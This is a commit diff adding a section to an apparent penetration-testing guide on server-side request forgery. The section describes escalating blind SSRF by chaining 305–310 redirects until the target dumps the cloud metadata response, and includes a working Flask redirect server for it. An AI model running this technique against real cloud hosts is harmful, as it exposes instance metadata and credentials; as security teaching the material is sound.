Skip to content

Commit 5e3f4b9

Browse files
committed
f
1 parent 40a6d9d commit 5e3f4b9

1 file changed

Lines changed: 36 additions & 0 deletions

File tree

  • src/pentesting-web/ssrf-server-side-request-forgery

src/pentesting-web/ssrf-server-side-request-forgery/README.md

Lines changed: 36 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -322,6 +322,42 @@ The difference between a blind SSRF and a not blind one is that in the blind you
322322

323323
**Checking the time** of the responses from the server it might be **possible to know if a resource exists or not** (maybe it takes more time accessing an existing resource than accessing one that doesn't exist)
324324

325+
### From blid to full abusing status codes
326+
327+
According to this [**blog post**](https://slcyber.io/assetnote-security-research-center/novel-ssrf-technique-involving-http-redirect-loops/), some blind SSRF might happen because even if the targeted URL responds with a 200 status code (like AWS metadata), this dat is not properly formatted and therefore the app might refuse to show it.
328+
329+
However, it as found that sending some redirecs responses from 305 to 309 in the SSRF it might possible to makethen application **follow these redirects while entering an error mode** that no longer will check the format of the data and might just print it.
330+
331+
The python server used to exploit this is th following:
332+
333+
```python
334+
@app.route("/redir")
335+
def redir():
336+
count = int(request.args.get("count", 0)) + 1
337+
# Pump out 305, 306, 307, 308, 309, 310 ...
338+
weird_status = 301 + count
339+
if count >= 10: # after 5 “weird” codes
340+
return redirect(METADATA_URL, 302)
341+
return redirect(f"/redir?count={count}", weird_status)
342+
343+
@app.route("/start")
344+
def start():
345+
return redirect("/redir", 302)
346+
```
347+
348+
**Steps:**
349+
- First 302 gets the app to start following.
350+
- Then it receives 305 → 306 → 307 → 308 → 309 → 310.
351+
- After the 5th strange code the PoC finally returns 302 → 169.254.169.254 → 200 OK.
352+
353+
**What happens inside the target:**
354+
- libcurl itself does follow 305–310; it just normalises unknown codes to “follow.”
355+
- After N weird redirects (≥ 5 here) the application’s own wrapper decides “something is off” and switches to an error mode meant for debugging.
356+
- In that mode it dumps the entire redirect chain plus final body back to the outside caller.
357+
- Result: attacker sees every header + the metadata JSON, mission accomplished.
358+
359+
Note that this is interesting to leak status codes that you couldn't leak before (like a 200). However, if somehow you could also select the status code of the response (imagine that you can decide that the AWS metadata responds with a 500 status code), **there might be some status codes that directly leak the content of the response.**
360+
325361
## Cloud SSRF Exploitation
326362

327363
If you find a SSRF vulnerability in a machine running inside a cloud environment you might be able to obtain interesting information about the cloud environment and even credentials:

0 commit comments

Comments
 (0)